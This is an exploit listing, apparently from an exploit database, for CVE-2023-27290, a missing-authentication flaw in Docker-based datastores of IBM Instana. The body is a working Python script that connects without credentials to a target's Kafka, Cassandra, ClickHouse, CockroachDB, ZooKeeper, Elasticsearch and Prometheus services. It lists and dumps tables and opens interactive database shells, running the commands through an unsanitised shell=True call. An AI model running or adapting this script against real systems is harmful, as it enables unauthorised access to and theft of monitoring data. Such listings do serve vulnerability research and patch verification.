Exploit for IBM Instana 243-0 Missing Authentication CVE-2023-27290

Name: Exploit for IBM Instana 243-0 Missing Authentication CVE-2023-27290
Rating: 5 (134 reviews)
2023-04-10 | CVSS 9.2
## https://sploitus.com/exploit?id=PACKETSTORM:171770
# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication   
# Google Dork: [if applicable]  
# Date: 06 March 2023  
# Exploit Author: Shahid Parvez (zippon)  
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability  
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana  
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)  
# Tested on: [Mac os]  
# CVE : CVE-2023-27290  
import argparse  
import subprocess  
import pexpect  
  
# Define the available options and their corresponding commands  
COMMANDS = {  
"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",  
"cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",  
"clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',  
"cockroach": "cockroach sql --host {host}:{port} --insecure",  
"zookeeper": "echo dump |ncat {host} {port}",  
"node-export": "curl http://{host}:{port}",  
"elasticsearch": "curl http://{host}:{port}/_cat/indices?v",  
"prometheus": "curl http://{host}:{port}/metrics",  
"clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'  
}  
  
# Define the parser for command-line arguments  
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")  
parser.add_argument("host", help="The host IP address")  
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")  
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")  
parser.add_argument("--output", help="Output the result to a file")  
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")  
  
# Parse the command-line arguments  
args = parser.parse_args()  
  
# Determine the port number to use  
if args.port is None:  
if args.option == "cassandra":  
port = "9042"  
elif args.option == "clickhouse":  
port = "8123"  
elif args.option == "cockroach":  
port = "26257"  
elif args.option == "elasticsearch":  
port = "9200"  
elif args.option == "kafka":  
port = "9092"  
elif args.option == "node-export":  
port = "8181"  
elif args.option == "prometheus":  
port = "9090"  
elif args.option == "zookeeper":  
port = "2181"  
else:  
port = str(args.port)  
  
# Build the command to execute  
command = COMMANDS[args.option].format(host=args.host, port=port)  
  
# Print the command line if verbose option is provided  
if args.verbose:  
print(f"Executing command: {command}")  
  
# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell  
if args.option == "cassandra":  
child = pexpect.spawn(command)  
child.expect("Connected to.*", timeout=10)  
child.interact()  
output = child.before  
elif args.option == "cockroach":  
child = pexpect.spawn(command)  
child.expect("root@.*:", timeout=10)  
child.interact()  
output = child.before  
# If any other option is selected, execute the command and capture the output  
else:  
output = subprocess.check_output(command, shell=True)  
  
# If an output file is provided, write the output to the file  
if args.output:  
with open(args.output, "wb") as f:  
f.write(output)  
  
# Print the output to the console  
print(output.decode())